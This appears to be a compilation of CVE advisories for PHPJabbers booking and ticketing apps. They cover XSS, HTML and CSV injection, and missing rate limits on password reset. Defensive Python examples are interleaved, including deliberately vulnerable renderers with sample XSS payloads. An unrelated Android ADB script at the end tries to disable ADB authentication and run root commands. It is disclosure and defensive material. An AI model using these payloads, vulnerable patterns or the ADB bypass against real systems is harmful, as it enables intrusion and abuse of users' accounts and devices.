<pre><code># Exploit Title: PHPJabbers Event Ticketing System v1.0 - Multiple HTML Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51303<br /><br />Description:<br />PHPJabbers Event Ticketing System v1.0 is vulnerable to multiple HTML<br />injection issues. HTML injection, also known as HTML code injection or<br />cross-site scripting (XSS), is a web security vulnerability that<br />allows an attacker to inject malicious code into a web page that is<br />then viewed by other users. This can lead to various attacks, such as<br />stealing sensitive information, session hijacking, defacement of<br />websites, or delivering malware to users.<br /><br />Parameters: "lid, name, plugin_sms_api_key, plugin_sms_country_code,<br />title".<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the System menu, then click SMS Settings.<br />3. Enter any HTML tag in the "SMS API Key" or "Default Country Code"<br />input field and Save.<br />4. You will see the HTML code rendered.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51303)<br /><br /><br /># Exploit Title: PHPJabbers Event Ticketing System v1.0 - Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51306<br /><br />Description:<br />PHPJabbers Event Ticketing System v1.0 is vulnerable to multiple<br />stored cross-site scripting issues. Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. The vulnerable parameters are "name, title".<br />3. Go to System Users, then click Add User.<br />4. Enter any XSS payload in the "Name" input field and Save.<br />5. You will see the XSS popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51306)<br /><br /><br /># Exploit Title: PHPJabbers Event Ticketing System v1.0 - Reflected XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51337<br /><br />Description:<br />A reflected cross-site scripting (XSS) vulnerability exists in the<br />"lid" parameter of the index page of PHPJabbers Event Ticketing System<br />v1.0 that allows attackers to execute arbitrary web scripts or HTML via<br />a crafted payload injected into the website login page parameter.<br /><br />Steps to Reproduce:<br />1. Visit the main URL.<br />2. Use an XSS payload in the "lid" parameter.<br />3. You will see the XSS popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51337)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cinema Booking System v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cinema-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51334<br /><br />Description:<br />A lack of rate limiting in the "Login Section, Forgot Email" feature<br />of PHPJabbers Cinema Booking System v1.0 allows attackers to send an<br />excessive number of reset requests for a legitimate user, leading to a<br />possible Denial of Service (DoS) via a large number of generated<br />e-mail messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL:<br />https://demo.phpjabbers.com/1704804809_816/index.php?controller=pjAdmin&action=pjActionIndex<br />2. Use an account e-mail address that is already registered on this website.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder and start the attack.<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51334)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cinema Booking System v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51333<br /><br />Description:<br />PHPJabbers Cinema Booking System v1.0 is vulnerable to CSV injection,<br />which allows an attacker to execute remote code. The vulnerability<br />exists due to insufficient input validation on the Unique ID field in<br />the Reservations list that is used to construct a CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the Options menu, click Language, then click the Labels section.<br />3. Enter a CSV injection payload in any field and go to Import/Export.<br />4. Click Export and open the file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51333)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51332<br /><br />Description:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Meeting Room Booking System v1.0 allows attackers to send an excessive<br />number of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large number of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL:<br />https://demo.phpjabbers.com/1704805602_793/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Use an account e-mail address that is already registered on this website.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder and start the attack.<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51332)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cleaning Business Software v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51331<br /><br />Description:<br />PHPJabbers Cleaning Business Software v1.0 is vulnerable to CSV<br />injection, which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct a<br />CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the Options menu, click Language, then click the Labels section.<br />3. Enter a CSV injection payload in any field and go to Import/Export.<br />4. Click Export and open the file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51331)<br /></code></pre>
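<p>The two CSV injection advisories above (CVE-2023-51333 and CVE-2023-51331) both come down to exported label or ID fields being written into a CSV file unchanged, so a cell that starts with a formula character is evaluated by the spreadsheet that opens it. The following is an added defensive example, not code from PHPJabbers or the advisory author: an export routine that neutralises formula-leading cells the way OWASP's CSV injection guidance recommends and fully quotes every field. The header names and row values are constructed for the example.</p>

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula
# (per OWASP CSV injection guidance); tab and CR are included because some
# importers treat them as the start of a new field.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Return a cell value that a spreadsheet will display as text, not evaluate.

    Genuine numbers pass through so a negative amount stays numeric; any
    string that starts with a trigger (ignoring leading spaces, which
    spreadsheets skip) is prefixed with a single quote.
    """
    if isinstance(value, bool):          # bool is an int subclass; keep it textual
        return str(value)
    if isinstance(value, (int, float)):
        return str(value)
    text = "" if value is None else str(value)
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(header, rows) -> str:
    """Write a CSV export with every cell neutralised and fully quoted.

    QUOTE_ALL doubles embedded quotes and wraps each field, so a value cannot
    break out of its cell even if it contains commas, quotes or newlines.
    """
    buffer = io.StringIO()
    writer = csv.writer(buffer, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow([neutralize_cell(cell) for cell in header])
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buffer.getvalue()


# Constructed sample export (not from the advisory): one label carrying a
# formula, one value with embedded quotes, one negative number.
SAMPLE_HEADER = ["Unique ID", "Label", "Amount"]
SAMPLE_ROWS = [
    ["=1+1", 'He said "hi"', -5],
    ["  @cmd", "plain text", 12.5],
]
```

The single-quote prefix is visible to the user but keeps the cell inert; any export that still needs a leading "-" or "+" for text should pass it through this function rather than special-casing it at the template level.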
<pre><code># Exploit Title: PHPJabbers Cinema Booking System v1.0 - Reflected Cross-Site Scripting<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cinema-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51330<br /><br />Description:<br />A reflected cross-site scripting (XSS) vulnerability exists in the<br />"date" parameter of the Schedule section of the Reservations menu in<br />PHPJabbers Cinema Booking System v1.0 that allows attackers to execute<br />arbitrary web scripts or HTML via a crafted payload injected into the<br />website login page parameter.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the Now Showing menu, then click Print.<br />3. Use an XSS payload in the "date" parameter.<br />4. You will see the XSS popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51330)<br /><br /><br /># Exploit Title: PHPJabbers Cinema Booking System v1.0 - Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cinema-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51335<br /><br />Description:<br />PHPJabbers Cinema Booking System v1.0 is vulnerable to multiple stored<br />cross-site scripting issues. Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. The vulnerable parameters are "title, name".<br />3. Go to the System Users menu, then click Add User.<br />4. Enter any XSS payload in the "Name" input field and Save.<br />5. You will see the XSS popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51335)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cleaning Business Software v1.0 - Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51328<br /><br />Description:<br />PHPJabbers Cleaning Business Software v1.0 is vulnerable to multiple<br />stored cross-site scripting issues. Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. The vulnerable parameters are "c_name, name".<br />3. Go to the System Users menu, then click Add User.<br />4. Enter any XSS payload in the "Name" input field and Save.<br />5. You will see the XSS popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51328)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cleaning Business Software v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51326<br /><br />Description:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Cleaning Business Software v1.0 allows attackers to send an excessive<br />number of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large number of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL:<br />https://demo.phpjabbers.com/1704803403_514/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Use an account e-mail address that is already registered on this website.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder and start the attack.<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51326)<br /><br /><br /># Exploit Title: PHPJabbers Cleaning Business Software v1.0 - Missing Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51327<br /><br />Description:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Cleaning Business Software v1.0 allows attackers to send an excessive<br />number of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large number of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL:<br />https://demo.phpjabbers.com/{*}/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Use an account e-mail address that is already registered on this website.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder and start the attack.<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51327)<br /></code></pre>
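<p>The missing-rate-limit advisories above (CVE-2023-51334, CVE-2023-51332, CVE-2023-51326 and CVE-2023-51327) all describe the same weakness: the "Forgot Email" endpoint sends a message for every request it receives, so repeated requests for one address flood that user's inbox. The following is an added defensive example, not PHPJabbers code: a sliding-window limiter that counts per target account and per client IP, behind a handler that replies identically whether or not a message was sent. The limits, window and response text are assumptions chosen for illustration.</p>

```python
import time
from collections import defaultdict, deque

# Same reply whether or not mail is sent, so the endpoint reveals neither
# which addresses exist nor whether the limit was hit.
NEUTRAL_RESPONSE = "If that address is registered, a message has been sent."


class ResetRateLimiter:
    """Sliding-window limiter keyed by target account and by client IP.

    The account limit stops a victim's inbox being flooded; the IP limit caps
    one client cycling through many addresses. The clock is injectable so the
    window logic can be tested without sleeping.
    """

    def __init__(self, per_account=3, per_ip=20, window_seconds=3600,
                 clock=time.monotonic):
        self.per_account, self.per_ip = per_account, per_ip
        self.window, self.clock = window_seconds, clock
        self._hits = defaultdict(deque)  # key -> timestamps still in the window

    def _prune(self, key, now):
        queue = self._hits[key]
        while queue and now - queue[0] >= self.window:
            queue.popleft()
        return queue

    def allow(self, email, client_ip):
        now = self.clock()
        # Normalise so "User@Example.com" and "user@example.com" share a bucket.
        checks = (("acct:" + email.strip().lower(), self.per_account),
                  ("ip:" + client_ip, self.per_ip))
        queues = [(self._prune(key, now), limit) for key, limit in checks]
        if any(len(queue) >= limit for queue, limit in queues):
            return False  # denied attempts are not recorded
        for queue, _ in queues:
            queue.append(now)
        return True


def handle_forgot_request(limiter, email, client_ip, send_mail):
    """Endpoint logic: send only what the limiter allows, always reply neutrally.

    Returns (response_text, mail_was_sent) so callers and tests can see both.
    """
    if limiter.allow(email, client_ip):
        send_mail(email)
        return NEUTRAL_RESPONSE, True
    return NEUTRAL_RESPONSE, False
```

In a multi-process PHP deployment the in-memory deques would be replaced by a shared store such as Redis, but the two-key check and the neutral response are the parts that matter.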
<pre><code># Exploit Title: PHPJabbers Shared Asset Booking System v1.0 - Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/shared-asset-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51325<br /><br />Description:<br />PHPJabbers Shared Asset Booking System v1.0 is vulnerable to multiple<br />stored cross-site scripting issues. Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. The vulnerable parameters are "title, name".<br />3. Go to the System Users menu, then click Add User.<br />4. Enter any XSS payload in the "Name" input field and Save.<br />5. You will see the XSS popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51325)<br /></code></pre>
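<p>Every XSS and HTML injection advisory on this page (the stored "name"/"title"/"c_name" fields and the reflected "lid" and "date" parameters) is the same root cause: a user-controlled value is written into the page without output encoding. The following is an added example, not code from PHPJabbers or the advisory author, that places the vulnerable rendering pattern beside its hardened form for both the stored and the reflected case, with a parser-based check a regression test can use. The sample values, the assumption that "lid" is a language id with a small allowlist, and all function names are constructed for the example.</p>

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample values (not from the advisories) standing in for the
# stored "name"/"title" fields and the reflected "lid" query parameter.
SAMPLE_NAME = "<script>alert(1)</script>"
SAMPLE_LID = 'en"><svg onload=alert(1)>'
ALLOWED_LIDS = {"en", "de", "fr"}  # assumption: lid is a language/locale id

def render_user_row_vulnerable(name, title):
    """The bug class: stored values concatenated straight into the HTML."""
    return f'<tr><td>{name}</td><td title="{title}">{title}</td></tr>'

def render_user_row_fixed(name, title):
    """Hardened form: escape at output time; quote=True covers attribute context."""
    name, title = html.escape(name, quote=True), html.escape(title, quote=True)
    return f'<tr><td>{name}</td><td title="{title}">{title}</td></tr>'

def render_login_vulnerable(query_string):
    """Reflected case: the lid query parameter echoed into a form unencoded."""
    lid = parse_qs(query_string).get("lid", ["en"])[0]
    return f'<input type="hidden" name="lid" value="{lid}">'

def render_login_fixed(query_string):
    """Allowlist the value first (defence in depth), then encode what is echoed."""
    lid = parse_qs(query_string).get("lid", ["en"])[0]
    if lid not in ALLOWED_LIDS:
        lid = "en"
    return f'<input type="hidden" name="lid" value="{html.escape(lid, quote=True)}">'

class _StartTags(HTMLParser):
    """Collects start tags so a regression test can spot any injected element."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def start_tags(fragment):
    """Return the element names a browser would create from the fragment."""
    parser = _StartTags()
    parser.feed(fragment)
    parser.close()
    return parser.tags
```

The parser check is stricter than string matching: the fixed renderers must yield exactly the template's own elements, so any value that sneaks a new tag in, however encoded, fails the test.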
<pre><code>#!/usr/bin/env python<br /><br />import subprocess<br /><br /># List attached devices to confirm the ADB connection<br />subprocess.run(["adb", "devices"])<br /><br /># Check whether the device is in secure USB (ADB authentication) mode<br />device = subprocess.run(["adb", "shell", "getprop", "ro.adb.secure"], stdout=subprocess.PIPE)<br />if "1" in device.stdout.decode():<br />    # Secure USB mode is enabled, so try to disable it<br />    # (ro.* properties are read-only once set, so this setprop normally fails)<br />    subprocess.run(["adb", "shell", "setprop", "ro.adb.secure", "0"])<br /><br /># Access ADB before Setup Wizard (SUW) completion; this opens an interactive shell<br />subprocess.run(["adb", "shell"])<br /><br /># Execute commands as the root user: toggle the charging LED as a visible check<br />subprocess.run(["adb", "shell", "su", "-c", "echo 0 > /sys/class/leds/led:green:charging/brightness"], check=True)<br />subprocess.run(["adb", "shell", "su", "-c", "echo 100 > /sys/class/leds/led:green:charging/brightness"], check=True)<br /></code></pre>